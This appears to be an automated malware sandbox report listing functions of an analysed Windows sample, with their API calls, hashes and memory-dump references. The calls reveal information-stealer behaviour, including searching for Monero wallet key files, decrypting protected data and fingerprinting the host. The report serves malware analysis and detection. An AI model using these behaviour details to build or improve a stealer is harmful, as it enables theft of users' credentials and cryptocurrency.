Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: 340b2be9c749ba8713428e0d6e3a178fe53907e4e023cf7f02c333a88c60d7f1
Instruction ID: 8ca3b623e1b2ab62d3adc1ee9629c5ad397778ba803448163df5cd7eabb352bc
Opcode Fuzzy Hash: 340b2be9c749ba8713428e0d6e3a178fe53907e4e023cf7f02c333a88c60d7f1
Instruction Fuzzy Hash: E7516EB1900219ABDF20EF50DC49BEE77B8FB04705F1080E8A605A72D1DB746A85CFA5

Function 00B97B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

GetKeyboardLayoutList.USER32(00000000,00000000,00BA05AF), ref: 00B97BE1
LocalAlloc.KERNEL32(00000040,?), ref: 00B97BF9
GetKeyboardLayoutList.USER32(?,00000000), ref: 00B97C0D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00B97C62
LocalFree.KERNEL32(00000000), ref: 00B97D22

Strings

/ , xrefs: 00B97C7F

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 24885a392d94270b5aefadea233a07edfe724128936d583f0ed00ff7bc912b07
Instruction ID: f28cf5d91d970bf9d31f2a91db6b2d51defa0bf9ebb39c7b45cf8e90aa4dc31e
Opcode Fuzzy Hash: 24885a392d94270b5aefadea233a07edfe724128936d583f0ed00ff7bc912b07
Instruction Fuzzy Hash: E4412D71950219ABDF24DB94DC99BEDB3B4FF44700F2041E9E009A2291DB342F85CFA1

Function 00B8E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

Part of subcall function 00B9A920: lstrcpy.KERNEL32(00000000,?), ref: 00B9A972
Part of subcall function 00B9A920: lstrcat.KERNEL32(00000000), ref: 00B9A982

Part of subcall function 00B9A9B0: lstrlen.KERNEL32(?,01339040,?,\Monero\wallet.keys,00BA0E17), ref: 00B9A9C5
Part of subcall function 00B9A9B0: lstrcpy.KERNEL32(00000000), ref: 00B9AA04
Part of subcall function 00B9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B9AA12

Part of subcall function 00B9A8A0: lstrcpy.KERNEL32(?,00BA0E17), ref: 00B9A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00BA0D73), ref: 00B8E4A2
StrCmpCA.SHLWAPI(?,00BA14F8), ref: 00B8E4F2
StrCmpCA.SHLWAPI(?,00BA14FC), ref: 00B8E508
FindNextFileA.KERNEL32(000000FF,?), ref: 00B8EBDF

Strings

\*.*, xrefs: 00B8E44D

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: aa7f0e333a856c086e8d2c623a0b168a79a48e9c9fda2ddd168459461a355947
Instruction ID: c85f3332d88066de7e923e34edf7a6e8406218658fbcb05e06a74e97802d644b
Opcode Fuzzy Hash: aa7f0e333a856c086e8d2c623a0b168a79a48e9c9fda2ddd168459461a355947
Instruction Fuzzy Hash: 63122D729101189ADF18FB70DCA6EED73B8AF55300F4045F9B50AA6191EE346F49CBE2

Function 00B99600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B9961E
Process32First.KERNEL32(00BA0ACA,00000128), ref: 00B99632
Process32Next.KERNEL32(00BA0ACA,00000128), ref: 00B99647
StrCmpCA.SHLWAPI(?,00000000), ref: 00B9965C
CloseHandle.KERNEL32(00BA0ACA), ref: 00B9967A

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 0cb17e583c9719cb1761acce763008325976982edf3e3453e4119da976279b17
Instruction ID: c56bfa92bb6b3af98b721cadb363ad8e784e5e68269495f1c40c7ed66bdcf4bf
Opcode Fuzzy Hash: 0cb17e583c9719cb1761acce763008325976982edf3e3453e4119da976279b17
Instruction Fuzzy Hash: 4501E975A00309ABCF54DFA9C988BEDBBF8EF48304F104198A905D6290D7349A40CF61

Function 00B98680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00BA05B7), ref: 00B986CA
Process32First.KERNEL32(?,00000128), ref: 00B986DE
Process32Next.KERNEL32(?,00000128), ref: 00B986F3

Part of subcall function 00B9A9B0: lstrlen.KERNEL32(?,01339040,?,\Monero\wallet.keys,00BA0E17), ref: 00B9A9C5
Part of subcall function 00B9A9B0: lstrcpy.KERNEL32(00000000), ref: 00B9AA04
Part of subcall function 00B9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B9AA12

Part of subcall function 00B9A8A0: lstrcpy.KERNEL32(?,00BA0E17), ref: 00B9A905

CloseHandle.KERNEL32(?), ref: 00B98761

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 8e402f6a66e7d78764d152d374019a7ef5b0bb469539374e9acb453b4b088021
Instruction ID: a4bc909d0da243c7af6519cc0da8053c7effed1f45a8574fa77199334000c8a3
Opcode Fuzzy Hash: 8e402f6a66e7d78764d152d374019a7ef5b0bb469539374e9acb453b4b088021
Instruction Fuzzy Hash: C5313C71911219ABCF24EB95DC85FEEB7B8FF46700F1041E9A10AA61A0DB346E45CFA1

Function 00B97A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0133E2B0,00000000,?,00BA0E10,00000000,?,00000000,00000000), ref: 00B97A63
RtlAllocateHeap.NTDLL(00000000), ref: 00B97A6A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0133E2B0,00000000,?,00BA0E10,00000000,?,00000000,00000000,?), ref: 00B97A7D
wsprintfA.USER32 ref: 00B97AB7

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: cc6c6dfc7b0f4ffea5ef7607c6f936a7825337842fc7db3b0cdb231945bce71c
Instruction ID: 678cc74d32a34a2cb02604411fb3d1fd920632da0d728a1e671f503f83481345
Opcode Fuzzy Hash: cc6c6dfc7b0f4ffea5ef7607c6f936a7825337842fc7db3b0cdb231945bce71c
Instruction Fuzzy Hash: 36118EB1A45219EBEB208B58DC49FA9BBB8FB04721F1043EAE90A932D0C7741E40CF51

Function 00B89B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00B89B84
LocalAlloc.KERNEL32(00000040,00000000), ref: 00B89BA3
LocalFree.KERNEL32(?), ref: 00B89BD3

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 396f11640b862a0d067b595db5dcd276a9926fe237cde12e72b583dd829cd69c
Instruction ID: 956229d3424ee82294822ca9341e1299233bae4d965af45cb9c7eaf785405486
Opcode Fuzzy Hash: 396f11640b862a0d067b595db5dcd276a9926fe237cde12e72b583dd829cd69c
Instruction Fuzzy Hash: F011A8B8A0020ADFDB04DF98D985EAE77B5FF88304F104598E91597350D774AE10CF61

Function 00B978E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B97910
RtlAllocateHeap.NTDLL(00000000), ref: 00B97917
GetComputerNameA.KERNEL32(?,00000104), ref: 00B9792F

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: 04369e8d446cbec003e36433165401b1f9092c5f76bde5fcaa672fbe540ad26e
Instruction ID: 4c24ed82c471b820841b3e0179acff4bbcef97782a9b871c3ad4da3c284136f1
Opcode Fuzzy Hash: 04369e8d446cbec003e36433165401b1f9092c5f76bde5fcaa672fbe540ad26e
Instruction Fuzzy Hash: B30186B1A54309EBDB00DF99DD45FAABBF8FB04B15F10426AF545E3380C77459008BA1

